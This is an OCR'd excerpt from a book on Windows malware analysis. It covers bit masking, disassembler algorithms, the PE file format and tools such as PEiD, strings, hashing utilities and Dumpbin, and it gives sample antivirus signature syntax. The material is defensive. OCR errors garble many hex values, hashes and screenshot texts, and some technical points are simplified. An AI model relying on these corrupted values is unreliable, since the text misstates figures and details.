arithmetic in the coming chapters. 


Boolean logic and bit 
masks 


Boolean logic can be thought of as a symbolic 
model that borrows from both mathematics and 
philosophy to understand, emulate, quantify, 
and implement specific human thought 
processes. This scheme was invented by George 
Boole, an Irish mathematician in the 1800s, in 
his seminal paper The Laws of Thought. George 
Boole was the first person to come up with a 
workable methodology to harness the process of 
human logic in a mathematical framework. 


The best way in which Boolean logic can be 
expressed in electrical and electronic engineering 
terms would be the series (more battery power) 
and parallel (longer battery life and reduced 
current) circuits. 


An AND gate can be constructed as a simple 
closed series circuit that consists of two switches, 
a battery, and one bulb/LED. Only if both 
switches are closed will the bulb light up. 


An OR gate can be constructed out of the same 
building blocks as the previous circuit, except 
that the switches are kept in parallel. Toggling 
any one of the switches or both at the same time 
will light the bulb up. The switches can be taken 
as the inputs to the gates. 


Another invention called the relay switch uses 
magnetism and mechanics to toggle switches on 
and off without human intervention. Later on, 
with the invention of semiconductor devices such 
as the transistor, the need for mechanical parts 


was removed and they act as electronic switches 
that perform the same function with more 
durability and reliability (unlike obsolete vacuum 
tubes as the prior intermediary technology). 


For our purposes, the most important logical 
operators are AND, OR, XOR, and NOT. 


AND and OR are dyadic operators. NOT is a 
monadic operator. 


AND takes two operands and produces a 1, only 
if both inputs are 1. 


OR takes two (or more) operands and produces a 
1 if either or both inputs are 1. Ever wonder how 
bit flags during programming are OR’d, one after 
the other? They are individual bit positions, and 
hence, an OR operation can be used to combine 
multiple bit flags. 


Both AND and OR produce 0 for both inputs of 0. 


NOT takes a single input and inverts it. If the 
input is 1, then the output is 0 and vice versa. 


XOR (ex-or) takes two operands and produces a 1 
only if either of the inputs is 1 and the other is 0. 
If both inputs are 1 or O, the output is 0. 


A curious feature of XOR is that XOR'ing two 
similar values produces a 0. 


XOR'ing the output back with either input 
produces the other input. C XOR A = B & C XORB 
=A, if A XORB=C. 


XOR is used in assembly instructions to set a 
register to zero in order to initialize values to a 


variable and is used for basic encryption and 
error checking. 


A truth table for each operator provides a tabular 
view of the inputs and outputs of each logic gate. 





Can you build the truth tables for the other 
Boolean operators? 


Bit masking 


Using AND and OR, we can extract or manipulate 
certain bit positions; this will be instrumental in 
understanding the process of bit masking. A bit 
mask is essentially a bit pattern applied in 
tandem with one of the logical operators to affect 
the target bit pattern so that certain bit positions 
are either set to 1 or 0. Think of masks as a filter 
to extract or block bit values at a particular 
position. This has various uses such as working 
on a bit or nibble level as the x86 instruction set 
does not allow bit-level manipulation directly, 
unless you are using one of the bitwise operators 
such as SHR or SHL (which are shifts made on 
the bit pattern going right or left a certain 
number of positions as required and the opposite 
end being padded with zeroes) among others. 


Bit masking can also be used to simplify certain 
programming and conversion tasks such as 
uppercase characters to lowercase, which can be 
done by setting the 6th bit (index 1 to 8th bit) of 
the ASCII value to 1 (lowercase); you are 
encouraged to derive this on your own as an 
exercise. Both uppercase and lowercase codes 
differ only in the 6th bit. Of course, in Windows, 


everything is Unicode, so this is a thing of the 
recent past but serves as a good example. Visit 
https://msdn.microsoft.com/en- 
us/library/windows/desktop/dd374081%28v=vs. 
85%29.aspx to learn more about it. More 
importantly, you will find masking of memory 
addresses to a multiple of the memory alignment 
size (LO00H or 4K) as a common occurrence in 
various algorithms and even in malware 
disassembly. 


Since AND'ing any pattern with O will result in O, 
AND can be used to zero out a bit pattern. OR'ing 
any bit pattern with 1 will let that value pass 
through. This can be used as a bit setter. Say 
1110 1110 (EEh) AND 1111 0000 (FOh) = 1110 
0000 (EOh) and 1110 1110 (EEh) OR 1111 0000 
(FOh) = 1111 1110 (FEh). So, to summarize, we 
can use a bitwise: 


e AND for testing/zero masking 
e OR for setting 
e XOR for toggling (can you figure out why?) 


Let us have a short tour of a malware analyst's 
toolbox before we move onto code constructs 
and disassembly. 


Breathing in the 
ephemeral realm 


Ideally, how you approach malware analysis from 
the perspective of disassembly code is largely 
dependent on your required objectives. While 
complete code coverage is certainly possible to a 
good degree, it is not always practical; hence, 
you have make a judgment call after you reach a 
point of diminishing returns, wherein exhausting 
the available resources will not yield a significant 
value any further. | believe that the three tenets 
of successful malware analysis include pattern 
recognition, the process of elimination, and cross- 
checking the available information. Concisely, it 
is a problem solving mindset with solid coding 
skills. Deciphering dead listings or raw 
disassembly text without executing the binary is 
one of the staples in any given malware analysis 
session and certainly has an /33t air to it as well 
as that of being a legacy method of binary code 
analyses in the earlier days of malware research. 
Of course, times have evolved and analysis 
automation is the order of the day, which given 
the quantity and quality of malware in vogue is a 
recommended process with mixed results. 
However, if you ever wish to do a dry run of any 
form of source code, it does not get more 
involved than this (also, if you enjoy tedium and 
have masochistic tendencies). 


Prior to reading disassembly code, you will also 
have to do binary reconnaissance in order to 
facilitate better static analysis. This would mean 
an analysis of the binary file format (PE/Coff 
format) in order to detect anomalies and 


understand its overall structure, also Known as 
header values and section data; take note of the 
special areas of the binary such as the data 
directory structures export/import/debug/tlLs, 
demarcate overlays in the binary, its record 
hashes (MD5/SHA1/2), and extract strings among 
various other procedures. All this activity is more 
like due diligence of the investigation a priori and 
will add value to your analysis efforts. 


Further, in the ideal dead listing session, runtime 
data will not be available immediately (you can 
always use debuggers or virtualization to get 
runtime data—dynamic analysis, which we will 
cover in the chapters ahead). This means things 
such as command-line switches, various input 
data, decryption and unpacking procedures, and 
multi-threading may have to be emulated via a 
judicious state recording of the CPU register 
values and the simulated process memory data 
structures. While you can copiously comment 
and subtext relevant lines of disassembly and 
watch call graphs in the disassembler, as well as 
edit function names and depict code as data or 
vice versa, nothing beats pencil and paper to 
etch mental models of the execution trace as well 
as depicting the complex interactions between 
different program and OS components. 


Your tools will only help you with presenting 
information contained in the binary in various 
ways. Your mileage depends on your knowledge 
level, experience, insights, and purpose. That 
said, malware analysis is not rocket science but 
rather an esoteric craft (software reverse 
engineering)—both art and science—and you do 
not need to be a guru to avail of this skill set, as 
anyone with time, patience, and practice can 





Sharpening the 
scalpel 


The regular disassembler is a static analysis 
software tool that performs many different 
processes and extracts information out of a 
binary executable. It parses the binary 
executable, takes apart the individual sections, 
and presents a list of annotated assembly code 
from the binary string of opcodes embedded 
inside the executable. 


Additional embellishments arrange relevant data 
such as symbolic function and variable names (if 
present), stack frames and variable lists, 
common data structures, strings, and import and 
export function jump lists. There are two primary 
algorithms that are implemented in a 
disassembler: 


e Linear Sweep (Windbg, Win32Dasm, Sourcer) 
e Recursive Traversal (OllyDbg, IDA Pro) 


Linear Sweep processes a binary executable by 
navigating to the code segment and reading the 
binary strings as a linear sequence of bytes, 
which are decoded according to a table of 
opcodes for a specific instruction set, much like a 
mapping process with an incrementing position 
counter to keep track of the next byte sequence 
to decode. The primary caveat is that because 
linear disassembly assumes the code section as 
pristine without being tainted by data elements, 
additional code constructs such as unreachable 
code, code interspersed with data (switch tables 
and function pointer tables), opaque predicates 
(fixed-value false conditional expressions), and 


stack frame pointer resolution cannot be done 
with confidence as cross references such as 
function call statements are not maintained. 
Thus, complicated machine code sequences can 
confuse the disassembly and result in junk code. 
However, code coverage is a feature that can be 
availed of when necessary. 


Recursion in computer science might remind you 
of mathematical induction and a growing stack- 
based nested function call sequence of a function 
calling itself. The recursive function requires a 
terminating condition in order to halt a repeated 
procedure for input values by calling itself 
repeatedly till the terminating condition is met. 
However, recursive traversal disassembly 
algorithm is a relatively complex undertaking 
that can be implemented in numerous ways. As a 
generic approach, all conditional (jnz/jxx) and 
unconditional code constructs (jmp/call) are 
taken into account and the control flow is 
traversed wherein the pseudo custom C data 
structure is as follows: 


typedef struct instruction metadata { 
unsigned int *instr_offset; /* 
instruction offset in executable 
or eip if emulated */ 
unsigned short op length; /* processed 
opcode length */ 
unsigned int *dest_ address; 
char array [op length]; /* opcode 
sequence */ 
unsigned int *return_address; /* for 
address of next instruction after call */ 
/* also current offset + opcode size */ 
/* data structure representing internal 
parameters required by 
the disassembler */ 
MetaData meta; 
}INS META; 


This structure is saved in the disassembler's 
internal data structures as branch lists (also 
known as jump list - which is confirmed code 
instructions or return list - which is yet to be 
identified addresses-code/data/tables) for 
resolving all control flow pathways. After each 
linear control path analysis pass, another address 
is retrieved from the branch list and the evaluate 
list, and the disassembly process resumes till 
both lists are empty. This list is re-processed in 
analysis passes, and cross references are drawn 
from the prior analysis, resulting in a much more 
coherent disassembly listing. Quite a bit of 
heuristics (for instance, compiler type-based 
assembly code templates and EBP or ESP-based 
stack frames) and code instructions vs. data 
statistical analyses strive to make this a more 
reliable process. The disassembly also annotates 
the disassembly code accordingly with identifiers 
and labels, and could even provide with 
disassembler-generated comments for familiar 
code sequences, to get the final code listing. 
Binary code disassembly can be an intractable 
problem, particularly if requiring user input or 
external data and with no named symbols in the 
executable, and things such as variable and 
function names are lost. While the disassembly 
will provide a lot of insight by presenting the 
code in the best possible light, whatever is 
remaining will have to be semantically 
reconstructed from the disassembly manually or 
using advanced algorithm-based code analysis 
tools. We will cover the standard disassemblers 
in vogue, as well as code analysis tools aimed for 
high-quality reconstruction and analysis. Because 
of the complexity involved, recursive traversal is 
more time consuming than linear sweep but 
more accurate and resilient to the issues that can 





Performing binary 
reconnaissance 


The PE format is the executable binary format in 
Windows. The overall structure of a PE file is 
shown in the exhibit; the PE file has a bunch of 
headers, which are metadata for the Windows 
loader to help load the image to process memory. 
The MZ or DOS header starts with the MZ or 
0x4D 0x5A magic number. The 4-byte value at 
offset 0x3C from the offset 0x0 of the MZ header 
gives the location of the start of the PE header, 
which has the signature’ PE\@\0' or 0x50 0x45 
0x0 Ox0. The PE header contains the optional 
header, which is a legacy term and is certainly 
not optional. Thereafter, the section header 
begins, which contains the metadata describing 
the sections and their properties—section name, 
raw and virtual size, and address and section 
characteristics. Thereafter, the sections 
themselves are linearly appended, one after the 
other. 


The following is an excerpt from the COFF 
specifications: 





Base of Image Header 


MS-DOS 2.0 Compatible 
EXE Header 


Unused 






OEM Identifier 
OEM Information 


MS-DOS 2.0 Section 
(for MS-DOS 


compatibility, only) 
Offset to PE Header 


MS-DOS 2.0 Stub Program 
and 
Relocation Table 


Unused 


PE Header 
(Aligned on 8-byte boundary) 


Section Headers 


Import Pages 
Import information 
Export information 
Base relocations 
Resource information 











The header data structures are as follows: 
Several underground articles also exist that do 
an admirable job of documenting the PE format; 
Goppit's PE tutorial, B. Luevelsmeyer's tutorial, 
and Kris Kaspersky's Hacker Debugging and 
Hacker Disassembling are also good references. 
Those who are interested in the golden age of 
Windows reverse engineering must search for + 
ORC's legacy on the Internet. 


TIP 


Downloading the example code 


You can download the example code files from your account at 


http://www.packtpub.com for all the Packt Publishing books you have 
purchased. If you purchased this book elsewhere, you can visit 
http://www.packtpub.com/support and register to have the files e-mailed 
directly to you. 





Scanning malware on the web 


If you can afford to submit a malware sample 
(say, make it public) or a hash of the sample to 
online scanners, you should be able to get a 
detection report and submit the sample for 
posterity, particularly if it is undetected and 
actually malware. Virustotal.com and Jotti.com as 
online scanners, and Anubis, Minibis, Cuckoo, 
BitBlaze, Comodo, ThreatExpert, Zero Wine, and 
BSA-Buster Sandbox Analyzer (potential 
abandonware though works for user mode 
malware that can run on XP and Win 7) are 
dependable among the myriad of scanners that 
fulfill this role. Installed antivirus products on 
your main host system or virtual machines can 
also be availed of to get the preliminary 
screening done; they have to be updated prior to 
scanning to ensure that they do not miss 
available signatures. Most have On-Demand 
Scanning, which is manually invoking the 
scanning process on a user-selected file, usually 
through shell integration (also known as right- 
click context menu item) in Windows. This is 
different from On-Access Scanning, which 
intercepts I/O calls and network activity via kernel 
filesystem and network filter drivers in all 
running OS processes, as well as removable 
media and network downloads to the filesystem, 
and proceeds with scanning them for malicious 
code, letting them continue if they are benign or 
else proceeding with termination, quarantine, or 
deletion of any malware present. Much of the 
toolsets that we will implement will focus on the 
PE/Coff format. Streamlining your toolkit must be 
an ongoing pursuit in addition to creating custom 
scripts and tools as and when needed; gear lust 
is not as important as knowing how to use the 
ones that you have inside out. Even if all the 


tools are taken away from an analyst, if he/she 
has a debugger, disassembler, hex editor, and 
development IDE (arguably, the only tool 
required as others can be made from this given 
enough time and motivation (and brains)), he or 
she can still fulfil their role. Before you examine 
the PE format, let us look at the battery of tools 
that we can incorporate in our daily analysis 
sessions for binary reconnaissance. Make sure 
that you have the most recent and updated 
versions of the following tools as this software 
can and will contain vulnerabilities that can be 
exploited, particularly given the context of 
malware analysis. The PE format is very well 
documented in MSDN: 
https://msdn.microsoft.com/en- 
us/windows/hardware/gg463119.aspx. 


Further, a good graphic of the PE format is 
available at 
https://raw.githubusercontent.com/corkami/pics/ 
master/PE101.png. 


Getting a great view with 
PEView 


PEView exudes simplicity and a good GUI design 
as compared to other click-and-browse tools while 
being a very robust format parser for every 
executable that you can throw at it. The tree 
control to the left categorically breaks up a PE 
binary into its constituents. The right view 
displays the hex dump or the section and header 
attributes. In the figure, the .text code section is 
selected with the hexdump view towards the 
right pane: 
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Know the ins and outs with 


PEInsider 


PEInsider from Cerbero is a more recent 


alternative to the Explorer Suite (CFF Explorer), 


its earlier offering. This is one of the more 
thoughtful designs with highly informative 


context-based displays. The overall features are 


similar to those of PEView. 
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Identifying with PEiD 


PEiD is a now defunct binary utility that is still 
immensely useful in detecting packers, 
compressors, and compiler/linkers, and has a 
slew of PE format-related features, including a 
concise GUI display of the most pertinent 
attributes of the PE executable, information 
gathered from the PE header/Optional 
Header/Data Directories/Section Headers, a task 
viewer to enumerate and manipulate running 
processes, including taking memory dumps and 
a dependency list, shell integration (right-click on 
Explorer.exe), and entropy calculation. A mini 
hex viewer and basic disassembler with control 
flow navigation (jmp/call) is directly linked with 
the PE section(s) view context menu along with 


section header attributes, which enables inbuilt 
navigation to the binary file for investigation. 
Signatures for packers and similar utilities are 
compiled in a text file called userdb. txt. You can 
add your own custom signatures to the 
database. 


The two main scanning modes are normal and 
deep. Normal mode scans the original entry 
point (OEP) of the executable for a match in the 
database signatures. Deep mode scans the 
section containing the OEP for a more accurate 
match. There is a hardcore mode that scans the 
entire file and thus, is used as a last resort. 
Finding the OEP can be a challenge many a 
times, if the packer is unknown. 


Some useful plugins are included such as KANAL 
plugin for crypto analysis and the Generic OEP 
finder. 


In the following image, the packer/compiler 
display label shows PECompact 2.x -> Jeremy 
Collake, which is the detection of the packer 
used in the input sample, PEiD itself in this case. 


File: {K:\ANALYZING DETECTION PED |PED-0.94\PED.exe = 


Entrypoint: |00001000 EP Section: |. text [>] 
File Offset: [00000400 First Bytes: |B8,64,A4,47 | > | 
Linker Info: [7.10 Subsystem: | Win32 GUI 


/PECompact 2.x -> Jeremy Collake 


Multi Scan | Task Viewer | | Options | About | Exit | 
| 1» | -> 


Jv Stay on top 





Obfuscated files and packed/compressed files are 
somewhat different implementations of the 


process of concealing something in the 
obfuscated binary that aims to confuse the 
human analyst as well as automatic code 
analyzers, while retaining the functionality of the 
original binary. The various obfuscation methods 
include source code- or binary code-specific 
manipulations, such as string mangling and the 
removal of source code variables and function 
identifiers to something seemingly random and 
redundant, thus increasing the complexity of the 
control flow analysis. Packing and compression 
focuses on code compaction and the reduction of 
the total binary file image footprint. This 
procedure increases the entropy and hence the 
obfuscating binary, to a certain extent. The PE 
file header values and sections are non-standard 
(manipulation of linker-generated headers and 
sections) and packer-specific; they rebuild the 
compressed import and export tables in the 
memory, which is usually done by an unpacking 
stub. 


Some code armoring is also done using 
virtualization, and an intermediate representation 
of the original assembly instructions that are 
mapped at runtime and JIT compiled by the 
execution engine. Care must be taken not to 
invoke the OEP finder plugins and the other 
unpacking plugins for PEiD, as doing so will 
execute the malware on the system and can 
possibly infect it during the analysis. 


Walking on frozen terrain with 
DeepFreeze 


DeepFreeze from Faronics is a great utility that 
has been around for quite some time now. It is 
excellent for use with the main standalone host 
system, and particularly, with a virtualization 


setup using VMware or VirtualBox to preserve 
system integrity. The baseline state is saved 
when you activate it from the notification bar in 
Windows, and post installation, execution 
(deliberate or accidental), and analysis of 
malware and the related packet captures, 
dropped files, and memory dumps, you can 
simply revert to your original baseline as many 
times as you like. Uninstalling can be a bit tricky 
for some installations (BIOS settings have to be 
manipulated), and be sure to remember the login 
password because even uninstalling from the 
Control Panel will not proceed if you lose the 
password and you could be stuck with a frozen 
machine that persists nothing else. 


Meeting the rex of HexEditors 


Hex editors are an essential utility to work with 
binary executables as they enable an as-is 
unbiased view of the file format that is as is and 
not tainted by any kind of parsing logic of a 
format viewer. This enables you to work at the 
byte level and build entirely new binary 
executables from scratch. Utilities are available 
that allow ease of editing on PE files built by 
motivated individuals over the course of research 
and coding cycles, which makes this look easy; 
however, when required, a well-featured hex 
editor gives unfettered access to working 
manually with import and export tables, PE 
headers, sections, overlays, wire captures, and 
memory dumps, among other assets. It is simply 
a hexadecimal view of a binary file, expressed as 
a binary string. Hex editors vary in the gamut of 
features provided out of the box; some of the 
more important ones include multiple file views, 
data structure templates, data type viewing, 
entropy calculation, hashing tools, strings search, 


offset navigation, bookmarks, and color 
mapping, file statistics, Boolean operations, 
encryption/decryption, support for large 
files/alternate data streams/filesystems, live 
acquisition, forensics utilities, and even a 
disassembler. 


Hex workshop is a very well-featured hex editor 
with many of the features discussed. 010 Editor 
has a great interface with flexible templates for 
data structures. Flex Hex supports large files and 
alternate data streams. WinHex is more of a 
forensics-focused hex editor with RAM editing 
and MBR/hard disk-focused features. 
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Digesting string theory with 
strings 


Sysinternals Suite has many useful utilities, 
and the strings.exe command-line utility does 
this one task very well. It takes the target file or 
folder as an input. 


The —a and —u switches can be used to display 
only ASCII or UNICODE as both are displayed by 
default. The —o switch appends the offset of each 
detected string in the file. -s can be used to 
recursively traverse a parent folder. The string 
length of 3 is set by default and can be changed 
using the —n <Length> switch. 


In the following figure, we can see the familiar 
fileoffset:string combination display of the 
MZ header and the standard section names 

. text, .rdata, .data, and .rsrc with the rest 
resembling junk. Version strings, API names, 
URIs, URLs, IP addresses, password lists, FTP 
login strings, HTTP GET requests, mutex names, 
HTML pages, IFrame tags, and embedded scripts 
are among some of the categorical strings that 
you can look out for during malware analysis. 


:tThis program cannot be run in DOS mode. 
:Rich 

:.text 

>‘ .pdata 

:@.data 

>. PSPC 


:D$Tj 








Bintext from FoundStone Inc. is a GUI strings tool 
and is another solid complement to the 
Sysinternal strings utility. 


For runtime strings analysis and image 
verification (Image tab | Verify button) of digital 
signing by certification root authority, you can 
use Process Explorer from Sysinternals. 
Although an execution monitoring tool, this tool 
has numerous features that can be utilized for 
malware analysis. Double-click the process name, 
navigate to the Strings tab, and choose the 
Memory radio button to see the strings in the 
process memory. 


If the malware is packed or compressed, the 
Image strings and Memory strings will be 
significantly different as the memory-unpacked 
regions have their packed strings unfurled. 


| Image | Performance Disk and Network Performance Graph 
| Threads | ToP/IP | Security | Environment | Job Strings 


Printable strings found in the scan: 


w, ccs=UTF-8 
[version] 
OS=%d. 44d. hd. Kd.%s 
VLC=2.1.3 Rincewind 
[exceptions] 

‘08 at %px 
[context] 

EDI:%px 

ESI:%px 

EBX: %px 

EDX: %px 

EAX:%ipx 

EBP: px 

EIP:%tpx 

ESP: %px 

[stacktrace] 
HEIPlbaseimodule 
[modules] 


Tkemel3? all 
< 

















Qlmage @)Memory 





The ASCII chart is given next for reference. You 
would read it like a grid value from the row and 
append the column value to obtain the resulting 
decimal value. The ASCII character '1' is read 
from row 4, and the column value is 9. You 
concatenate 4 and 9 to get 49, which is also 
Ox31: 





ASCII values are 7-bit encoded numeric codes 
assigned to symbols, which consist of natural 
numbers, upper case and lower case letters of 
the English alphabet, punctuation symbols, 
carriage return, line feed, null, backspace, and 
other special characters. Because 7 bits are used, 
there are 2“ 7 or 128 characters that can be 
used. ASCII provides for the first 128 characters 
of Unicode. Unicode uses 16 bits, and hence, 
provides for more than 65,000 numeric codes, 
out of which about 40,000 are already used, 
which leaves a lot of codes for future use. 


Hashish, pot, and stashing with 
hashing tools 


Hashing utilities are useful for identifying and 
watermarking files and malware samples for 
further processing and for posterity. The MD5 





and SHA-1/2 variants are the most commonly 
used algorithms. FileAlyzer 2 has a 
comprehensive hashing feature (the Hashes 
tab) and an interesting set of features for 
preliminary binary and text file (scripts and html) 
investigation, including network support for 
online malware scanners such as 
https://www.virustotal.com/. Shell integration 
means that any file can be analyzed from the 
Windows Explorer context menu, which makes it 
the first tool that you may ideally use for initial 
triage. It packs quite a bit, including a 
disassembler, a hex viewer, packer/compiler 
detection, support for archive files, ssdeep 
hashing using imported DLLs (ssdeep.dll), and 
Clam AV scanning (Libclamav.dll). 
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Location: C;\Users\user\Desktop\, 
Size: 30720 0000000000007800 
Version: 
CRC-32: 40352064 
MDS; SD5ED 1F4C6212E0BAAB6386 1959C57CD 
SHA-1: 2A553B7BE1774376AD99348D 1042C4ED 3F394C 48 
Read only Directory Microsoft Visual C++ 8,0 [Debug 
Hidden ¥| Archive 
System file Symbolic link 
Creation: Saturday, May 9, 2015 4:54:42 PM 2015-05-09 16:54:42 
Last access: Saturday, May 9, 2015 4:54:42 PM 2015-05-09 16:54:42 
Last write: Saturday, May 9, 2015 4:54:42 PM 2015-05-09 16:54:42 
Creation (UTC): Saturday, May 9, 2015 11:24:42 AM 2015-05-09 11:24:42 
Last access (UTC): Saturday, May 9, 2015 11:24:42 AM 2015-05-09 11:24:42 


Last write (UTC): Saturday, May 9, 2015 11:24:42 AM 2015-05-09 11:24:42 





Nirsoft's (Nir Sofer) HashMyFiles utility is an 
excellent Windows-based GUI hashing tool. It 
takes a file or a folder as input and lists out in 
columns hashes for MD5, SHA-1, CRC32, SHA- 
256, SHA-512, and SHA-384. It also displays the 
created and modified times, the full path of the 
file, file size, version strings, file extensions, 
identical files, file attributes, and 
https://www.virustotal.com/ submission. 


Hashing tools can be used to generate malware 
database hash lists, as well as for checking the 
integrity of the existing binaries. Hashing also 
plays an important role in antivirus signature 
creation. During and after analyses, you would 
be ideally using a hex editor to create checksums 
and hashes of byte regions with parameters such 
as the number of bytes to hash, as well as the 
start offset and with additional parameters from 
the OEP or some offset of it or backwards into a 
file or from the last byte of a file and hashes of 
overlays, among other options. Once you have 
the required hashes, you would be customizing 
and compiling them for each binary by using 
vendor-specific VDL (Virus Definition 
Language) or Signature SDK, which exposes a 
set of APIs that the antimalware engine utilizes 
for detection during scanning. Quite a few of the 
vendors have internal and networked point-and- 
click interface systems for the analyst exposing 
features of the sample(s) and generating hashes 
and processing them directly from the sample 
queues without even having to download the 
sample binaries for a local system analysis, 
unless mandated. The relatively simple 1:1 static 
signatures look something like the following: 


Trojan "Win32/Agent.AB" // malware is a 
trojan, nomenclature of Agent and a 
variant name of AB 


{ 

entrypoint(0x15B8) ; //entrypoint in 
the raw file image 
HashEntrypoint (0x0,0x4B0,0x127C099B) ; 
//hash of OEP dropout till 0x4B0 of 
malicious data 


HashFileStart(0x3E15,0x1BE0,0x00E44360) ; 
//data island in code section + related 
code 


} 


A moving window and wildcard-based signature 
looks like the following: 


Name:Dropper.Malware2.AA 
{ 


$1 = 4A 4F 38 34 30 31 50 52 49 4E 43 50 
48 41 53 54 41 54 5C 54 65 6D 70 5C 


$2:=50 FF 90 58 02 80 00: 59 33 CO C3 55 
8B EC 81 EC OC [4-6] 8B 75 08 57 8D BE F8 
04 00 00 57 33 DB 53 6A 04 FF 96 34 03 ?? 
it 65. CO OF 85 B4 00: 00 00 


$3=HashResourcelcon(0x43547687) ; 


} 


Here, the pattern is in hex bytes; the square 
brackets denote that for the length of the next 
89 bytes, if you find the value 30h, then you can 
continue with the rest of the signature. The ?? 
wildcard means that any byte value can be 
present after EBh and before 40h. Since the OEP 
is not specified, the OEP is searched first and 
then the beginning of the code section and then 
the top and tail of the file, including all sections 
and overlays (except the code section that is not 
scanned again). The resource malware-specific 
icon asset is checked for a checksum match. 


Polymorphic malware is checked for the 
decryption stub and the decrypted malware code 


and other file properties to enable robust 
detection without using brute force on the 
keyspace or doing exactly that for oligomorphic 
malware that has a fixed or a feasibly finite 
number of decryption keys. 


These basic signatures are then recompiled to a 
performance-efficient custom binary format 
before they are fed to the antimalware signature 
database. They are also made modular so that 
live updates are possible. The other variant is 
generic signatures wherein heuristics and data 
mining algorithms are implemented to capture 
the essence of a malware family or generation or 
fingerprint a new one if it is a variant. This 
requires creating a failsafe set of conditions in 
the format that is specified by the generic 
detection engine, usually as a detection script 
that returns a positive detection if all or most of 
the conditions are met. This is usually a more 
involved effort and requires judicious testing for 
false positives and false negatives till the point of 
diminishing returns. API sequence profiling and 
instruction opcode statistical analysis are some of 
the methods that can be used to provide inputs 
for generic signatures. 


To get an idea of how antivirus products can be 
analyzed, have a look at the following links: 


e https://lock.cmpxchg8b.com/sophailv2.pdf 


e http://www.darkreading.com/vulnerabilities-and- 
threats/sophos-av-teardown-reveals-critical- 
vulnerabilities/d/d-id/1107265 


e http://www.zdnet.com/article/approximately-800- 
vulnerabilities-discovered-in-antivirus-products/ 


Here is a paper on fuzzy hash: 
http://jessekornblum.com/presentations/cdfsl07.p 
df. 


Getting resourceful with 
XNResource Editor 


XNResourceEditor is a well-featured and easy- 
to-use resource editor utility for executable files. 
The resources are a Set of binary assets that are 
compiled using a resource compiler to the format 
expected by the PE specification, which the linker 
finally integrates into the resulting executable. 
Usually the .rsre section in the executable 
contains the compiled resources. The Bitmap 
section displays bitmaps that are used by the 
executable; the Dialog section displays dialog 
items implemented in the executable, which 
could be the main interface template; the 
Version strings contain properties such as 
ProductVersion, ProductName, FileVersion, 
FileDescription, LegalCopyright, 
LegalTrademarks, and CompanyName, which 
could be used to add detection logic post 
analysis; String Table contains null-terminated 
Unicode strings (Windows is fully Unicode, 
although ASCII text can also be present in the 
binary); Cursor Group contains cursor files; and 
Icon Group contains icon files. 
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Many malware binaries contain junk text- or 
malware-specific identifiers in the Version section 
and the String Table section. Resource sections 
can contain malicious code as they can be any 
binary asset, and hence, are important for the 
purposes of investigation. Further, even if an 
executable is not executing or is corrupted in the 
code, possibly post re-infection or an error in the 
unpacking algorithm, the OEP might be patched 
badly or might require a condition for redirection 
among a host of other reasons. If the resource 
section is relatively unaffected, you can still 


investigate the binary prima facie with a resource 
editor as the dialogs and strings, as well as the 
interface layout and icons, can reveal a lot about 
the binary in question. You can then use the 
Internet to gather more information about the 
resource assets. The assets themselves can be 
examined for validity and embedded shellcode or 
malware. Anti-malware signatures for fake 
antivirus and spyware (where the resource icons, 
strings, bitmaps, version strings, and for that 
matter, any confirmed malicious asset in the 
resource section) can be included in composite 
malware signatures and in the detection logic 
post the extraction of resources. 


Too much leech with 
Dependency Walker 


Depends.exe, or Dependency Walker, is a very 
thorough tool for providing detailed listings of all 
dependencies that are statically linked and 
dynamically called via imports or delay-load 
imports. 


In the following image, the sample bcb6kg.EXE 
file is set as input (drag and drop). We see the 
list of imported DLLs on the left-most pane tree 
control. If you select any entry in the list, such as 
Kernel32.dll, the adjacent top-right pane 
contains the list of functions imported from 
Kernel32.dll. The pane just below it will display 
the complete set of functions exported by 
Kernel32.dll, which depending on the context, 
might not be too useful as of now. The pane 
above the bottom pane displays the binary 
information of the modules that will be loaded by 
the sample executable. The bottom pane 
displays error messages and the log output of 
the activities. 


The runtime profiling feature F7 ensures that 
dependencies that cannot be resolved via a 
binary static analysis will be integrated into the 
report. Of course, certain libraries might not be 
invoked without external input or user 
intervention, and in such a case, it will not be 
detected, but in most cases, it will do a 
reasonably good job: 
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Getting dumped by Dumpbin 


This is the Swiss army knife for everything PE 
from Microsoft. It comes with the MASM32 SDK as 
well as most of the developer SDKs by Microsoft, 


including Visual Studio installations (via Visual 
Studio Command Prompt). 


Microsoft (R) COFF/PE Dumper Version 7.186.307? 
Copyright (C) Microsoft Corporation. All rights reserved. 


usage: DUMPBIN [options] [files] 


options: 


/ALL 
/ARCHIVEMEMBERS 
/CLRHEADER 
/DEPENDENTS 
AN Oe BAU chy 
/DISASMLE:<BYTES tNOBYTES> ] 
ZEXPORTS 
/FPO 
/HEADERS 
/IMPORTSL:filenane ] 
/L.INENUMBERS 
/LINKERMEMBER[ :<1 12>] 
/LOADCONFIG 
/OUT: filename 
/PDATA 
/PDBPATHL: VERBOSE] 
/RAWDATAL: {NONE 1112 14183(0,#]1 
/RELOCAT I ONS 
/SECTION: name 
/SUMMARY 

(press <return> to continue) 
/SYMBOLS 
/UNWINDINFO 








Simply type DUMPBIN /ALL <filename> to dump 
everything about a PE file. You could append it to 
a text file for ease of recall as the console buffer 
will run out. 


For simple automation, you could type the 
following in cmd.exe on a folder of binary 
samples for batch processing (replace the %i 
variable with %%i for a .bat batch file). 


FOR %i in (*.exe *.dll) do dumpbin 
/imports %i >> imports.txt 


Dumpbin.exe has to be in the current folder or 
configured in the environment variables. The 
preceding command enumerates all the .exe 
and .dlLl files, invokes dumpbin with the 
/imports switch, and appends the output to 


imports.txt in the current folder. You can 
replace the switches accordingly. The following 
screenshot shows how the imports are reported 
in Dumpbin with the virtual addresses (with 
respect to the image base of the executable) and 
function name hint values as well as the function 
name strings in their own columns. In case the 
function names are not present, the function 
ordinals are used instead, which are just 
numbers (from #1 and not 0). 


File Type: EXECUTABLE IMAGE 


Section contains the following imports: 


MSUCRT .d11 
16612D6 Import Address Table 
1625618 Import Name Table 
FFFFFFFF time date stamp 
FFFFFFFF Index of first forwarder reference 


28G625ADD vsprintf 
78QBAE78 __CxxFrameHandler 
7886114C _EH_prolog 
780029BF strstr 

78612D7C _strnicmp 

7801 7BBF _fullpath 
78003685 memmove 

786131FC strftime 
?802A4BF localtime 
78617F59 _stat 

788128DC strncmp 

78QGADBB _CxxThrowExcept ion 
7862A875 time 

78GQ6F56A _except_handler3 
?8G83C1E _controlfp 
78GGB20C ??1type_inf o@@UAECRKZ 
78883 E6A __p__commode 
78B03E5A __set_app_type 
78003E64 __p__fmode 

78061 DEA _initterm 
7803BB70 _adjust_fdiv 
7806B426 __setusermatherr 
7800269E exit 

78803E70 __getmainargs 
78038568 _acmdln 

78816847 strtoul 

